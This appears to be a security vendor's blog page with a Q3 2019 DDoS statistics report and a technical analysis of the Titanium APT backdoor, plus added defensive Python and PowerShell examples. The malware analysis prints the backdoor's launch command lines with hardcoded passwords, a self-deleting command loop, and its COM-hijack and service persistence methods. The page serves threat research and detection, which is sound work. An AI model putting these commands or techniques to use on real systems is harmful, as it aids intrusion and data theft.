November 11, 2019

DDoS attacks in Q3 2019

News overview

This past quarter we observed a new DDoS attack that confirmed our earlier hypothesis regarding attacks through the Memcached protocol. As we surmised, the attackers attempted to use another, rather exotic protocol to amplify DDoS attacks. Experts at Akamai Technologies recently registered an attack on one of their clients that was carried out by spoofing the return IP address through the WS-Discovery multicast protocol. According to other security researchers, cybercriminals started using this method only recently, but have already achieved an attack capacity of up to 350 Gbps. The WSD protocol has limited scope and is not generally intended for connecting machines to the Internet; rather devices use it to automatically discover each other on LANs. However, it is fairly common for WSD to be used not entirely for its intended purpose in a variety of equipment — from IP cameras to network printers (about 630,000 such devices are currently hooked up to the Internet). Given the recent rise in the number of WSD-based attacks, owners of such devices are advised to block on the server UDP port 3702, which is used by this protocol, and to take a number of additional steps to protect their routers.

Another new tool in the hands of DDoSers was detected by our colleagues at Trend Micro in the shape of a new payload distributed through a backdoor in the data search and analytics tool Elasticsearch. The malware is dangerous because it employs a multi-stage approach to infection, successfully avoids detection, and can be used to create botnets for launching large-scale DDoS attacks. Trend Micro recommends all Elasticsearch users to upgrade to the latest version, since the backdoor has already been patched.

That said, cybercriminals are far more likely to turn to proven techniques than to try out new ones. For instance, when last year the FBI took down a number of inexpensive DDoS-for-hire sites, new ones immediately sprang up in their place, and today the threat is more acute than ever. According to some reports, the number of attacks carried out with their assistance increased by 400% against the previous quarter.

It is highly likely that the attack on World of Warcraft Classic, launched in early September in several waves was organized through such a service. Before each episode, a certain Twitter user warned of the impending attack. Blizzard later announced the arrest of the mastermind, although whether it was the owner of the corresponding Twitter account remains unclear. But if so, it is hard to escape the conclusion that, far from being a member of a spin-off hacker group, it was a client of a DDoS-for-hire service.

Using another tried-and-tested method (a botnet similar to Mirai — or one of its clones), a 13-day application-level attack was unleashed in July against a streaming service with a capacity of up to 292,000 requests per second. The attack involved about 400,000 devices, mainly home routers.

But whereas the motives behind these two attacks can only be guessed at, two other attacks that took place this summer and fall were almost certainly politically driven. Thus, August 31 saw the targeting of LIHKG Forum, one of the main websites used by protesters in Hong Kong to coordinate their actions. According to the site owners, it was hit by 1.5 billion requests in 16 hours, taking it temporarily offline and causing the mobile app to malfunction.

Soon after that, an attack was conducted on Wikipedia. It began on the evening of September 6 and made the world’s largest online encyclopedia temporarily unavailable to users in various countries of Europe, Africa, and the Middle East. Wikipedia gets hit quite often, but this attack was exceptional in terms of capacity (exact figures are not available, but unofficial sources say more than 1 Tbps) and duration (three days).

The attack organizers remain at large, but several other investigations over the past quarter did reach their logical conclusion. For instance, in early July a US federal court sentenced a certain Austin Thompson of Utah to 27 months in prison and a fine of $95,000 for an attack on Daybreak Game Company (formerly Sony Online Entertainment). And on September 6 another cybercriminal, Kenneth Currin Schuchman of Washington State, admitted his involvement in setting up the Satori IoT botnet.

On the topic of law enforcement efforts, mention must be made of one other piece of news that highlights the importance of prevention in the fight against DDoS attacks. For several quarters now, the section on global botnet activity in our report has featured countries that just a couple of years ago were unlikely contenders to make the ratings. Moreover, the shares of other countries previously beloved of cybercriminals have been falling. This trend was also noted by TechNode, backed up by data from Nexusguard and the World Bank. Our colleagues pinpoint two factors to explain the situation. First, countries once collectively referred to as the Third World have seen rising living standards. More and more residents there are acquiring smartphones and broadband routers — that is, devices that most botnets are made from. Second, in regions where cybercriminals have been plying their trade for a long time, cybersecurity awareness is on the up, and more effective measures are being taken to protect devices, including at the provider level, which means that attackers are having to search for pastures new. This is what is changing the face of our lists of regions by number of cyberattacks.

Quarter trends

Q3 typically sees a lull in DDoS activity over the summer months, followed by a September spike associated with the start of the academic year. This year was no exception.

According to data from Kaspersky DDoS Protection, the number of smart attacks (that is, ones more technically sophisticated and requiring more ingenuity) declined significantly in Q3 against the previous quarter. However, comparing this indicator with the same period last year, we see more than double growth. The prediction made in previous reports is clearly coming true: the DDoS market is stabilizing for smart attacks too. With this in mind, it will be extremely interesting to see the Q4 results.

This stabilization of the market, where growth has been observed throughout the year, is also evidenced by the fact that the average duration of smart attacks is practically unchanged since Q2, yet almost double against Q3 2018. At the same time, the average duration of all attacks fell slightly due to the overall increase in the number of short-lived DDoS sessions.

The giant leap in the maximum duration of attacks on the graph comes from one very long smart attack that we observed this quarter. That this is just a curious anomaly is clearly visible from the medium-length columns.

Changes in the number and statistical distribution of DDoS attacks in Q3 2019 compared to Q2 2019 and Q3 2018

The change in the share of smart DDoS attacks in the general stream of cyber offensives is worth a separate mention.

Changes in the share of smart DDoS attacks in Q3 2019 compared to Q2 2019 and Q3 2018

The ratio of smart attacks to the total number of offensives almost halved against the previous quarter but increased by 7 p.p. compared to Q3 2018; the decline in the share of smart attacks against the end of H1 is due to the quirks of September’s statistics.

Like last year, the arrival of September went hand in hand with a significant rise in the number of DDoS attacks. Moreover, this month accounted for 53% of all Q3 attacks, and it was only because of September that any growth in general was observed.

What’s more, 60% of DDoS activity in the early fall was directed at education-related resources: electronic grade books, university websites, and the like. Against the backdrop of such attacks, most of which are short and poorly organized, the share of smart attacks in Q3 sank by 22 p.p.

We observed a similar picture last year, since it is due to students returning to school and university. Most of these attacks are acts of cyber hooliganism carried out by amateurs, most likely with no expectation of financial gain.

Note that the total number of attacks in September 2019 versus September 2018 increased by 35 p.p., while the total number of attacks in Q3 2019 compared to Q3 2018 climbed by 32 p.p. That is, these figures are roughly the same, while the difference in the growth indicators for the number of smart attacks is far greater: whereas the total number of smart attacks increased by 58 p.p., the number of smart attacks in September rose by only 27 p.p., and the month’s share of smart attacks even declined by 3 p.p. This confirms once again the extent to which September skews the overall statistical picture.

Changes in the number and statistical distribution of DDoS attacks in September 2019 compared to September 2018

Changes in the share of smart DDoS attacks in September 2019 compared to September 2018

As such, in Q3 2019, for the first time in the past year, not only did we not observe a clear rise in the number of smart attacks, we saw their total number fall. It is quite possible that last quarter’s positive forecast — that the DDoS market would become saturated and stop growing — came true.

However, based on the experience of past years, in Q4 we expect to see growth in all key indicators (total number of attacks and smart attacks; duration of attacks), since the end of the year is a holiday season, which means more commercial and thus criminal activity. Yet if the conclusions about market stabilization are correct, this growth will not be that considerable.

That the indicators will drop or even remain at the Q3 level seems unlikely to us — in any case, the prerequisites for such a turnout of events are not yet visible.

The barrage of attacks on the education sector will subside by winter, but it will be left completely in peace only in summer when school’s out.


Kaspersky Lab has a long history of combating cyber threats, including DDoS attacks of all types and complexity. Company experts monitor botnets using the Kaspersky DDoS Intelligence system.

The DDoS Intelligence system — part of the Kaspersky DDoS Protection solution — intercepts and analyzes commands sent to bots from C&C servers. The system is proactive, not reactive, meaning that it does not wait for a user device to get infected or a command to be executed.

This report contains DDoS Intelligence statistics for Q3 2019.

In the context of this report, the incident is counted as a single DDoS-attack only if the interval between botnet activity periods does not exceed 24 hours. For example, if the same web resource was attacked by the same botnet with an interval of 24 hours or more, then this is considered as two attacks. Bot requests originating from different botnets but directed at one resource also count as separate attacks.

The geographical locations of DDoS-attack victims and C&C servers used to send commands are determined by their respective IP addresses. The number of unique targets of DDoS attacks in this report is counted by the number of unique IP addresses in the quarterly statistics.

DDoS Intelligence statistics are limited to botnets detected and analyzed by Kaspersky Lab. Note that botnets are just one of the tools used for DDoS attacks, and that this section does not cover every single DDoS attack that occurred during the review period.
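The counting rule above (periods of one botnet against one target merge into a single attack unless they are separated by 24 hours or more; different botnets against the same target always count separately) is a small interval-merging algorithm, and the duration buckets used later in the report follow from the merged intervals. The implementation below is an added example written for this page, not the DDoS Intelligence system's own code. The activity periods are constructed; the report is ambiguous about an interval of exactly 24 hours, and this code follows its second sentence (24 hours or more splits). The 10–19 hour bucket is an assumed split; the other buckets are the ones the report names.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

MERGE_GAP = timedelta(hours=24)

# Constructed botnet activity periods: (target_ip, botnet_id, start, end). Not real telemetry.
SAMPLE_PERIODS = [
    ("203.0.113.10", "botnet-A", datetime(2019, 7, 22, 1, 0), datetime(2019, 7, 22, 3, 0)),
    ("203.0.113.10", "botnet-A", datetime(2019, 7, 22, 10, 0), datetime(2019, 7, 22, 12, 0)),  # 7 h idle: same attack
    ("203.0.113.10", "botnet-A", datetime(2019, 7, 24, 0, 0), datetime(2019, 7, 24, 2, 0)),    # 36 h idle: new attack
    ("203.0.113.10", "botnet-B", datetime(2019, 7, 22, 2, 0), datetime(2019, 7, 22, 2, 30)),   # other botnet: separate attack
    ("203.0.113.20", "botnet-A", datetime(2019, 7, 1, 0, 0), datetime(2019, 7, 12, 15, 0)),    # 279 h, like the quarter's longest
    ("203.0.113.20", "botnet-A", datetime(2019, 7, 13, 15, 0), datetime(2019, 7, 13, 16, 0)),  # exactly 24 h idle: counted separately
]


def merge_attacks(periods, gap=MERGE_GAP):
    """Collapse activity periods of one botnet against one target into attacks.

    Periods merge while the idle interval between them is shorter than `gap`;
    an idle interval of `gap` or more starts a new attack.
    """
    by_key = defaultdict(list)
    for target, botnet, start, end in periods:
        by_key[(target, botnet)].append((start, end))

    attacks = []
    for (target, botnet), spans in by_key.items():
        spans.sort()
        cur_start, cur_end = spans[0]
        for start, end in spans[1:]:
            if start - cur_end < gap:
                cur_end = max(cur_end, end)   # still the same attack, extend it
            else:
                attacks.append({"target": target, "botnet": botnet, "start": cur_start, "end": cur_end})
                cur_start, cur_end = start, end
        attacks.append({"target": target, "botnet": botnet, "start": cur_start, "end": cur_end})
    for a in attacks:
        a["hours"] = (a["end"] - a["start"]).total_seconds() / 3600
    return attacks


def duration_bucket(hours):
    """Buckets the report's text names (<=4 h, 5-9 h, 20-139 h, 140+ h); 10-19 h is an assumed split."""
    if hours <= 4:
        return "<=4h"
    if hours < 10:
        return "5-9h"
    if hours < 20:
        return "10-19h"
    if hours < 140:
        return "20-139h"
    return "140h+"


def summarize(attacks):
    """The headline figures the report derives: attack count, unique targets, longest, duration mix."""
    return {
        "attacks": len(attacks),
        "unique_targets": len({a["target"] for a in attacks}),
        "longest_hours": max(a["hours"] for a in attacks),
        "by_duration": dict(Counter(duration_bucket(a["hours"]) for a in attacks)),
    }


if __name__ == "__main__":
    print(summarize(merge_attacks(SAMPLE_PERIODS)))
```

Unique targets are counted by IP address, as the report says, so the two botnets hitting 203.0.113.10 contribute three attacks but one target. The exactly-24-hour case is included in the sample precisely because it is the edge the rule has to decide.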

Quarter summary
  • China remains top by number of attacks, with a practically unchanged share compared to Q2 (62.97% against 63.80%).
  • The unexpected guest in the Top 10 ranking by territorial distribution of attacks was South Africa, which took fourth place (2.40%), having never previously appeared in our leaderboard.
  • The Top 10 in terms of territorial distribution by number of targets is similar to the Top 10 by number of attacks: the Top 3 were again China (57.20%), the US (22.16%), and Hong Kong (4.29%).
  • In the past quarter, peak DDoS botnet activity was observed in July; the most dangerous day was Monday (17.53% of attacks), and the quietest was Sunday (10.69%).
  • The longest attack lasted more than 11 days (279 hours), almost half the length of the longest attack in Q2.
  • The most common type of attack is still SYN flooding (79.7%), with UDP flooding in second place (9.4%). The least popular is ICMP flooding (0.5%).
  • The shares of Windows and Linux botnets are almost unchanged against Q2; Linux botnets still account for the vast majority (97.75%) of activity.
  • The leader by number of botnet C&C servers is once more the US (47.55%), followed by the Netherlands in second (22.06%) and China in third (6.37%).

Attack geography

As in previous quarters, the leader by number of attacks is still China, whose share fell by 0.83 p.p. to 62.97%. Likewise, the US remains in second place: its share slightly decreased to 17.37% (against last quarter’s 17.57%). Hong Kong firmly established itself in the bronze position. In contrast to China and the US, its share grew, albeit only by 0.83 p.p. to 5.44%.

The trend seen in past quarters continued, with an interloper rising from the lower ranks into the Top 10. This time it was South Africa (2.4%), soaring up from 19th position last quarter. It seized fourth place from the Netherlands (0.69%), which dropped down to ninth. What’s more, the Top 10 welcomed back South Korea after a long absence — but not in the Top 3 as before, rather in eighth place with just 0.71%.

Also worth noting is Romania, which gained 0.93 p.p. and rejoined the Top 10 in sixth position with 1.12%. Romania, South Africa, and South Korea collectively squeezed out Taiwan, Australia, and Vietnam.

Distribution of DDoS attacks by country, Q2 and Q3 2019

The geographical distribution of unique targets this quarter has a lot in common with the distribution of number of attacks — which is fairly typical for statistics of this kind. The Top 3 here also belongs to China (57.20%), the US (22.16%), and Hong Kong (4.29%), with shares close to those in the rating by number of attacks. But there are variances in both Top 10s below. These are partly due to the small share of each individual country (except for the Top 3), which means that even minor fluctuations cause major reshuffles.

For instance, South Africa (1.83%) entered the Top 10 by number of unique targets, though not in fourth place, but fifth, giving way to the UK (2.71%). In the list of leaders by number of attacks, the situation is the opposite: the UK is fifth behind South Africa. Romania also made it back into the rating with a share of 0.71%, while South Korea was pushed overboard. This quarter’s rating also had no place for Taiwan and Ireland.

France remained in last place, its share falling by 0.23 p.p. against the previous quarter to 0.67%.

Distribution of unique DDoS-attack targets by country, Q3 and Q4 2019

Dynamics of the number of DDoS attacks

Q3 was relatively calm, with clear peaks and troughs being observed only in July. The most eventful day of this month was the 22nd, with 457 attacks. We also registered a high number of attacks (369) on July 8. The calmest day was August 11 (65 attacks).

Dynamics of the number of DDoS attacks in Q3 2019

The Q3 distribution of the number of attacks by day of the week was similar to Q2. The safest day in DDoS terms was Sunday (10.69% of attacks), although its share was slightly up from last quarter. As previously, the statistical majority of DDoS attacks occurred on Mondays (17.53%). The only significant difference from last quarter is that the second quietest day (after Sunday) from July to September was not Friday, but Thursday (13.16%).

Distribution of DDoS attacks by day of the week, Q2 and Q3 2019

Duration and types of DDoS attacks

The longest attack this past quarter (traditionally against a Chinese ISP) lasted 11.6 days (279 hours), which is 1.8 times shorter than in Q2 (509 hours). In fairness, however, it should be noted that the longest attack of Q2 is the all-time record holder since our observations began.

Meanwhile, no global changes were seen in the summary statistics: the share of attacks lasting 140+ hours dropped by 0.01 p.p. to 0.12%. Conversely, the share of 20–139-hour attacks increased slightly, while the share of 5–9-hour attacks fell by 1.5 p.p.; the total share of the shortest attacks (lasting no more than four hours) rose just under 2 p.p. to 84.42%.

Distribution of DDoS attacks by duration (hours), Q2 and Q3 2019

The leading attack type remains SYN flooding. Its share changed inappreciably, down from 84% to 79.7%. Second place again went to UDP attacks (9.4%), while HTTP- and TCP-based attacks swapped places: whereas before HTTP flooding ranked third by frequency, it now lies in fourth place with a share of 1.7%, while the share of TCP flooding climbed to 8.7%, more than doubling against the previous quarter (3.1%). As before, ICMP flooding was in last place in Q3.

Distribution of DDoS attacks by type, Q3 2019

The share of Linux botnets continues to grow: Q3’s figure was 97.75%, while the share of Windows botnets, respectively, sank by 1.75 p.p. to 2.25%. This is not due to the growth in activity of Linux botnets, but to the decline in activity of Windows-oriented zombie networks.

Ratio of Windows/Linux botnet attacks, Q2 and Q3 2019

Botnet distribution geography

As in Q2, the US tops the leaderboard by number of C&C servers located in the country, its share increasing from 44.14% to 47.55%. In second place is the Netherlands: its share also rose — from 12.16% to 22.06%. Such solid growth could not fail to have a major impact on most of the other top-tenners. China, for instance, whose share increased by only 1.42 p.p. to 6.37%, rose from fifth to third place, pushing the UK into fourth (4.90%).

Russia also climbed up the rating into fifth position with a share of 3.92%, while Greece and South Korea slipped out. The newcomer in the Top 10, in bottom place on 1.47%, was Romania, which this quarter also appeared in the leaderboards by number of DDoS attacks and their targets.

Distribution of botnet C&C servers by country, Q3 2019


Statistically, Q3 2019 differs little from Q2. In terms of geographical distribution of attacks and targets, we saw a continuation of the now familiar trend of unexpected guests appearing, only to drop out the next quarter.

As for the chronological distribution of attacks, Q3 was again similar to Q2: turbulence was observed at the beginning of the quarter, with a lull in the middle and small peaks and troughs at the end. The characteristic distribution of attacks by day of the week also remained practically unchanged. The duration of the longest attack fell compared to the previous quarter, but the difference in the percentage shares of long and short attacks is barely noticeable.

All this could indicate either that the DDoS attack market has temporarily stabilized, or that we face a statistical anomaly. The picture will become clearer upon the analysis of subsequent observations.

November 8, 2019

Titanium: the Platinum group strikes again

Platinum is one of the most technologically advanced APT actors with a traditional focus on the APAC region. During recent analysis we discovered Platinum using a new backdoor that we call Titanium (named after a password to one of the self-executable archives). Titanium is the final result of a sequence of dropping, downloading and installing stages. The malware hides at every step by mimicking common software (protection related, sound drivers software, DVD video creation tools).


During our research we found that the main targets of this campaign were located in South and Southeast Asia.


The Titanium APT includes a complex sequence of dropping, downloading and installing stages, with deployment of a Trojan-backdoor as the final step. Almost every level of the system mimics known software, such as security software, software for making DVD videos, sound drivers’ software etc.

In every case the default distribution is:

  1. an exploit capable of executing code as a SYSTEM user
  2. a shellcode to download the next downloader
  3. a downloader to download an SFX archive that contains a Windows task installation script
  4. a password-protected SFX archive with a Trojan-backdoor installer
  5. an installer script (ps1)
  6. a COM object DLL (a loader)
  7. the Trojan-backdoor itself

Infection vector

We believe the Titanium APT uses local intranet websites with a malicious code to start spreading.

1 – Shellcode

Another known way of spreading is the use of a shellcode that needs to be injected into a process. In this case it was winlogon.exe. Unfortunately, we don’t know how the shellcode was injected. See the shellcode description below.

2 – Wrapper DLLs

Attackers make active use of various kinds of ‘wrappers’. Each wrapper is usually a COM DLL, with the corresponding exported functions. The main purpose of these libraries is to decrypt and load an encrypted file (previously dropped somewhere) into the system memory (a payload) and then redirect calls to the wrapper itself to the payload’s exported functions.

Another type of wrapper DLL is designed to obtain a command line from its exported function argument passed by a caller and create a new process.

3 – Windows task installer (SFX archive)

This is a password-encrypted SFX archive that can be downloaded via BITS Downloader. The password is hardcoded into the downloader that is used to decrypt the SFX archive using the -p command line argument.

The main feature of this archive is that it contains the cURL executable code, compiled into a DLL. Its purpose is to install the Windows task to establish persistence in the infected system.

4 – Trojan-Backdoor installer (SFX archive)

The backdoor itself uses an SFX archive which must be launched from the command line with a password to unpack it. All path examples below are for the DVD-making software mimic; the same notes apply to any of the other known software paths.

5 – BITS Downloader

This component is used to download encrypted files from the C&C server then decrypt and launch them.

Shellcode description

The shellcode itself contains position-independent code and doesn’t require previously loaded libraries (except Kernel32.dll). Its sole purpose is to connect to the hardcoded C&C address, download an encrypted payload (the password-protected SFX archive), then decrypt and launch it using the hardcoded unpacking password. The usual command line is:

"rundll32 "$temp\IOZwXLeM023.tmp",GetVersionInfo -t 06xwsrdrub2i84n6map3li3vz3h9bh4vfgcw"

BITS Downloader description

The BITS Downloader is a DLL file which has only one exported function: GetVersionInfoA. The main purpose of this library is to download files in encrypted form from the C&C and launch them.

Execution sequence

The first thing the downloader does is to check whether it was started using the SYSTEM user. If it was, it launches command line arguments (that were passed to the binary loaded by the downloader DLL) using WMI.

If it wasn’t started using the SYSTEM user, the downloader passes command line arguments into the argument parser.

Argument parser

  • -c URL: specifies a URL address where system information will be sent
  • -t STRING: an additional string that will be appended to the request string sent to the C&C
  • -u URL: confirmation URL where the downloader sends various confirmations or requests data; it is possible to build in two additional confirmation URLs
  • -br GUID: stops a payload download; the GUID parameter must provide a download task GUID

If one of these parameters exists, the downloader will collect information about installed antivirus products and send it to the C&C.

After that, it sends the download request to the confirmation URL. In response, the C&C sends a file that will be downloaded in the %USERPROFILE% directory.

To decrypt the downloaded file, the downloader uses an MD5 hash of the strings’ encryption key.

Confirmation URL request and file downloading

Default (hardcoded) URL:

The request is a string such as:

  • (x86)
  • (x64)

Payload decryption and launch

This is the structure of the encrypted file:

    typedef struct {
        byte  hash[16];         // MD5 hash of the following data
        dword data_size;        // length of data in bytes
        byte  data[data_size];  // the encrypted payload
    } enc_data;

The downloader compares the hash field with the MD5 it computes over the data field, and if they match, performs the following actions:

  • Appends an extension (DLL or EXE, depending on data type)
  • Stores the downloaded file in the %TMP% folder under the name %(SystemTimeAsFileTime.dwLowDateTime)%.TMP
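The enc_data layout above is simple enough that an analyst can verify candidate blobs the same way the downloader does: read the 16-byte MD5 and the dword length, check that the body is really that long, and recompute the digest. The parser below is an added example written for this page, not code from the report or from the malware; the sample blob is constructed, and the little-endian dword is an assumption (the report gives the field types but not their byte order). The cipher used for the data field is not described on the page, so the example stops at the container.

```python
import hashlib
import struct

HEADER = struct.Struct("<16sI")  # 16-byte MD5, then a little-endian dword data_size


def build_enc_data(data):
    """Wrap bytes in the enc_data layout. Used here only to construct test fixtures."""
    return HEADER.pack(hashlib.md5(data).digest(), len(data)) + data


def parse_enc_data(blob):
    """Parse one enc_data blob and verify its MD5 the way the report says the downloader does.

    Returns (data, hash_ok). Raises ValueError if the header cannot be read or the
    body is shorter than data_size claims; a wrong hash is reported, not raised,
    so a tampered or unrelated file can still be inspected.
    """
    if len(blob) < HEADER.size:
        raise ValueError("blob shorter than the 20-byte enc_data header")
    stored_hash, data_size = HEADER.unpack_from(blob, 0)
    data = blob[HEADER.size:HEADER.size + data_size]
    if len(data) != data_size:
        raise ValueError(f"data_size says {data_size} bytes, only {len(data)} present")
    return data, hashlib.md5(data).digest() == stored_hash


def looks_like_enc_data(blob):
    """Cheap triage for unknown files: is there a self-consistent enc_data header in front?"""
    try:
        _, ok = parse_enc_data(blob)
    except ValueError:
        return False
    return ok


# Constructed sample standing in for a downloaded payload. The body is arbitrary bytes,
# not an encrypted stage from the campaign.
SAMPLE_BLOB = build_enc_data(b"constructed sample payload bytes, not a real Titanium stage")


if __name__ == "__main__":
    body, ok = parse_enc_data(SAMPLE_BLOB)
    print(f"hash ok={ok}, data_size={len(body)}")
```

Note that a matching MD5 only proves the blob was not corrupted in transit; it says nothing about who produced it. For triage that is exactly the point: a file in %USERPROFILE% or %TMP% whose first 20 bytes form a consistent enc_data header is worth a closer look regardless of what the body decrypts to.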

Then the downloader specifies a command line to launch the downloaded file. If the file is a DLL, the final command line will be:

"%systemroot%\system32\rundll32.exe %(SystemTimeAsFileTime.dwLowDateTime)%.TMP,-peuwewh383eg -t 06xwsrdrub2i84n6map3li3vz3h9bh4vfgcw"

If the file is an EXE file:

%(SystemTimeAsFileTime.dwLowDateTime)%.TMP -peuwewh383eg -t 06xwsrdrub2i84n6map3li3vz3h9bh4vfgcw

After that, the downloader deletes itself using the following command line:

/c for /L %i in (1,1,100) do ( for /L %k in (1,1,100) do (del /f /q module_path > NUL & if not exist module_path exit /b 0))

File launching

To launch the downloaded file, the downloader uses the WMI classes Win32_ProcessStartup, Win32_Process and their methods and fields.

File downloading using BITS

To download a file, the downloader uses the BITS service and its COM interface, called IBackgroundCopyManager.

It creates a task with the name Microsoft Download, then specifies remote and local file paths and timeouts.

Windows task installation (SFX archive with cURL)

It contains:

  • p.bat: launches cURL and the obfuscated ps1 scripts
  • c.dll: cURL executable compiled as a DLL (7.50.3)
  • f1.ps1: executed after the first request to the C&C; decrypts x.dat
  • f2.ps1: executed after the second request to the C&C; decrypts b.dat
  • e.ps1: contains code that calculates a string for the Authorization field of the HTTP header
  • h.ps1: gets information about the system proxy settings
  • e.dll: a DLL file with a single exported function; calls CreateProcessA

It downloads:

  • x.dat, decrypted to u.xml: AES-encrypted file (see f1.ps1 for the decryption algorithm)
  • b.dat, decrypted to i.bat: AES-encrypted file (the same decryption algorithm)

The result:

  • i.bat: performs Windows task installation

When a caller (previous step) executes this archive, it must specify two arguments:

  • -pKEY: argument with the key to unpack the SFX archive
  • -t ACCEPTANCE_ID_STRING: argument with a long string, the AcceptanceID (used in requests to the C&C)

p.bat

It launches the h.ps1 script to get information about system-wide proxy settings. After that it launches the e.ps1 script to calculate the SystemID that will be used in requests to the C&C.

To send a request, it uses c.dll (which is cURL and has an exported function called DllGetClassObject).

Request 1

Command line arguments:


  • %pp%: system-wide proxy
  • %output%: SystemID
  • %p3%: AcceptanceID

This request downloads the x.dat file, and the f1.ps1 script decrypts it into u.xml. After that it launches the next request.

Request 2

Command line arguments:

It downloads the b.dat file, and the f2.ps1 script decrypts it into i.bat (using the same decryption algorithm).

Task installation

After that, it launches the following command line to install the persistence task:

The i.bat file uses the previously decrypted u.xml file as the task description.

Trojan-backdoor installer

The archive unpacks its files into the following folder (in the case of DVD making software):

The archive itself contains:

  • BabyBoyStyleBackground.wmv – Configuration data
  • DvDupdate.dll – Trojan-backdoor loader
  • nav_downarrow.png – Trojan-backdoor
  • psinstrc.ps1 – Loader installation script

In the case of the audio drivers software mimic, it differs only in its installation method compared to DVD making software: the ps1 script uses two known CLSIDs to replace their COM DLL paths with malicious ones.


This is the installer script that registers DvDupdate.dll as the ‘DVDMaker Help’ service and sets DllGetClassObject as its entry point. It requires admin privileges to execute correctly.

The script contains configurable parameters, so it’s easy to change any of the required parameters for different systems.

There are two ways the loader can be installed:

  • System service, with the DllGetClassObject exported function as the ServiceMain function
  • COM object, by replacing an existing CLSID registry path with its own
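The artifacts described in this section (the ‘Microsoft Download’ BITS job, the ‘DVDMaker Help’ service DLL with DllGetClassObject as ServiceMain, the rewritten CLSID InprocServer32 paths and the task installed from u.xml) can be hunted for on a host. The script below is an added example, not code from the Securelist post; the "user-writable directory" heuristic, the function name and the output format are its own assumptions.

```powershell
# Added hunting script (not part of the Securelist post). Read-only; run from an
# elevated session so that all-user BITS jobs and HKLM service keys are visible.
function Find-TitaniumArtifacts {
    $findings = New-Object System.Collections.Generic.List[string]
    # Assumed heuristic: legitimate services and COM servers rarely live here.
    $userWritable = '\\Users\\|\\ProgramData\\|\\Temp\\'

    # 1. BITS jobs: the downloader creates a job named 'Microsoft Download' (post).
    Import-Module BitsTransfer -ErrorAction SilentlyContinue
    Get-BitsTransfer -AllUsers -ErrorAction SilentlyContinue |
        Where-Object { $_.DisplayName -eq 'Microsoft Download' } |
        ForEach-Object {
            $remote = ($_.FileList | ForEach-Object { $_.RemoteName }) -join ','
            $findings.Add("BITS job '$($_.DisplayName)' owner=$($_.OwnerAccount) remote=$remote")
        }

    # 2. svchost-hosted services: the loader is registered as 'DVDMaker Help' with
    #    DllGetClassObject as ServiceMain (post), which is an unusual entry point.
    Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue |
        ForEach-Object {
            $svc = Get-ItemProperty -LiteralPath $_.PSPath -ErrorAction SilentlyContinue
            $prm = Get-ItemProperty -LiteralPath "$($_.PSPath)\Parameters" -ErrorAction SilentlyContinue
            if (-not $prm -or -not $prm.ServiceDll) { return }
            $dll = [Environment]::ExpandEnvironmentVariables($prm.ServiceDll)
            if ($_.PSChildName -eq 'DVDMaker Help' -or $svc.DisplayName -eq 'DVDMaker Help' -or
                $prm.ServiceMain -eq 'DllGetClassObject' -or $dll -match $userWritable) {
                $findings.Add("Service $($_.PSChildName): ServiceDll=$dll ServiceMain=$($prm.ServiceMain)")
            }
        }

    # 3. COM hijack: the installer script rewrites the InprocServer32 path of two
    #    existing CLSIDs (post). Flag DvDupdate.dll or any user-writable path.
    #    HKCU hits from user-installed applications are expected; review them by hand.
    foreach ($hive in 'HKLM:\SOFTWARE\Classes\CLSID', 'HKCU:\SOFTWARE\Classes\CLSID') {
        Get-ChildItem $hive -ErrorAction SilentlyContinue | ForEach-Object {
            $ips = Get-ItemProperty -LiteralPath "$($_.PSPath)\InprocServer32" -ErrorAction SilentlyContinue
            if (-not $ips) { return }
            $path = [Environment]::ExpandEnvironmentVariables([string]$ips.'(default)')
            if ($path -match 'DvDupdate\.dll$' -or $path -match $userWritable) {
                $findings.Add("CLSID $($_.PSChildName) in $hive -> $path")
            }
        }
    }

    # 4. Scheduled tasks: i.bat installs a task from the decrypted u.xml (post); the
    #    task name is not given, so look at where each action executes from instead.
    Get-ScheduledTask -ErrorAction SilentlyContinue | ForEach-Object {
        $task = $_
        foreach ($a in $task.Actions) {
            $cmd = "$($a.Execute) $($a.Arguments)"
            if ($cmd -match $userWritable -and $cmd -match '\.(bat|ps1|dll)\b') {
                $findings.Add("Task $($task.TaskPath)$($task.TaskName): $cmd")
            }
        }
    }
    return $findings
}

Find-TitaniumArtifacts | ForEach-Object { Write-Output $_ }
```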

This is a service DLL, but with all the same exports you would expect from a COM object. Basically, it’s a payload loader.

The whole code is obfuscated with different Windows API calls and loops. It wasn’t designed to confuse a reverse engineer or to make reverse engineering harder, but to bypass some simple AV emulation engines.

The first exported function for every COM object is DllGetClassObject.


The loader creates a thread that decrypts the payload, restores its PE and MZ headers, and then loads it into memory and launches it. The payload is encrypted with AES-256-CBC. The decryption key is hardcoded along with other encrypted strings. The encrypted payload does not contain the ‘MZ’ and ‘PE’ tags, which allows it to bypass simple AV engines. After initializing the payload, the loader calls its function with ordinal 1.


The payload, with backdoor functionality, is a DLL file. The malware functionality is in the first exported entry only.

nav_downarrow.png – Ordinal 1 (Trojan-backdoor main function)

The first thing that it does is decrypt the other encrypted binary (containing configuration data) from the SFX content:

The configuration itself is divided into blocks, and every block has its own index. The payload uses these indices to get a specific item. The configuration contains:

  • the C&C address
  • traffic encryption key
  • the UserAgent string
  • other less important parameters

Execution thread

The execution thread is responsible for receiving commands from the C&C server and sending responses. It contains an execution loop that starts by reading configuration item #00 to get the C&C address.

Initializing C&C communication

To initialize the connection to the C&C, the payload sends a base64-encoded request that contains a unique SystemID, computer name, and hard disk serial number. After that, the malware starts receiving commands.

Receiving commands

To receive commands from the C&C, the payload sends an empty request to the C&C. It uses the UserAgent string from the configuration and a special cookie generation algorithm to prepare a request. The malware can also get proxy settings from Internet Explorer.

In response to this request, the C&C answers with a PNG file that contains steganographically hidden data. This data is encrypted with the same key as the C&C requests. The decrypted data contains backdoor commands and arguments for them.

Examples of PNG files:

C&C command processor (command descriptions)

The backdoor can accept many different commands, with the following among the most interesting:

  • Read any file from a file system and send it to the C&C
  • Drop or delete a file in the file system
  • Drop a file and run it
  • Run a command line and send execution results to the C&C
  • Update configuration parameters (except the AES encryption key)
  • Interactive mode – allows the attacker to feed input to console programs and receive their output via the C&C

The Titanium APT has a very complicated infiltration scheme. It involves numerous steps and requires good coordination between all of them. In addition, none of the files in the file system can be detected as malicious due to the use of encryption and fileless technologies. One other feature that makes detection harder is the mimicking of well-known software.

Regarding campaign activity, we have not detected any current activity related to the Titanium APT.

November 5, 2019

DarkUniverse – the mysterious APT framework #27

